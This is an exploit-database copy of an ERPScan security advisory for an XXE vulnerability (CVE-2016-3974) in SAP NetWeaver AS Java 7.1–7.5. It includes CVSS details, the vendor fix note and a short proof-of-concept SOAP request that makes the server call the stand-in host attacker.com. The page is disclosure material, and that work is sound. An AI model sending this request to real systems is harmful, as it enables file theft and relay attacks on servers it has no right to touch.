Lucene search

K
zdtERPScan1337DAY-ID-25127
HistoryJun 21, 2016 - 12:00 a.m.

SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE

2016-06-2100:00:00
ERPScan
0day.today
33

0.011 Low

EPSS

Percentile

82.9%

Exploit for java platform in category web applications

Application: SAP NetWeaver AS JAVA
 
Versions Affected: SAP NetWeaver  AS JAVA 7.1 - 7.5
 
Vendor URL: http://SAP.com
 
Bug: XXE
 
Sent:  20.10.2015
 
Reported: 21.10.2015
 
Vendor response: 21.10.2015
 
Date of Public Advisory: 08.03.2016
 
Reference: SAP Security Note 2235994
 
Author:  Vahagn Vardanyan  (ERPScan)
 
 
 
Description
 
 
1. ADVISORY INFORMATION
 
Title: [ERPSCAN-16-013] SAP NetWeaver  AS  Java ctcprotocol servlet –
XXE vulnerability
 
Advisory ID: [ERPSCAN-16-013]
 
Risk: Medium
 
Advisory URL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
 
Date published: 08.03.2016
 
Vendors contacted: SAP
 
 
2. VULNERABILITY INFORMATION
 
Class: XXE
 
Impact: denial of service
 
Remotely Exploitable: Yes
 
Locally Exploitable: No
 
CVE-2016-3974
 
 
CVSS Information
 
CVSS Base Score v3:  6.4  / 10
 
CVSS Base Vector:
 
AV : Attack Vector (Related exploit range) Network (N)
 
AC : Attack Complexity (Required attack complexity) High (H)
 
PR : Privileges Required (Level of privileges needed to exploit) High (H)
 
UI : User Interaction (Required user participation) None (N)
 
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
 
C : Impact to Confidentiality High (H)
 
I : Impact to Integrity High (H)
 
A : Impact to Availability High (H)
 
 
 
3. VULNERABILITY DESCRIPTION
 
Authorized attacker can use a special request to read files from the
server and then escalate his or her privileges.
 
 
 
4. VULNERABLE PACKAGES
 
SAP NetWeaver AS JAVA 7.1 - 7.5
 
Other versions are probably affected too, but they were not checked.
 
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, install SAP Security Note 2235994
 
 
 
6. AUTHOR
 
Vahagn Vardanyan  (ERPScan)
 
 
7. TECHNICAL DESCRIPTION
 
 
An XML external entity (XXE) vulnerability in the Configuration Wizard
in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial
of service, conduct SMB Relay attacks, or access arbitrary files via a
crafted XML request related to the ctcprotocol servlet.
 
PoC
 
 
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
Content-Type: text/xml
 
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
 <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
  <url>attacker.com</url>
 </m:XXX>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
 
 
 
 
8. REPORT TIMELINE
 
Sent:  20.10.2015
 
Reported: 21.10.2015
 
Vendor response: 21.10.2015
 
Date of Public Advisory: 08.03.2016
 
 
 
 
9. REFERENCES
 
https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/

#  0day.today [2018-01-03]  #

0.011 Low

EPSS

Percentile

82.9%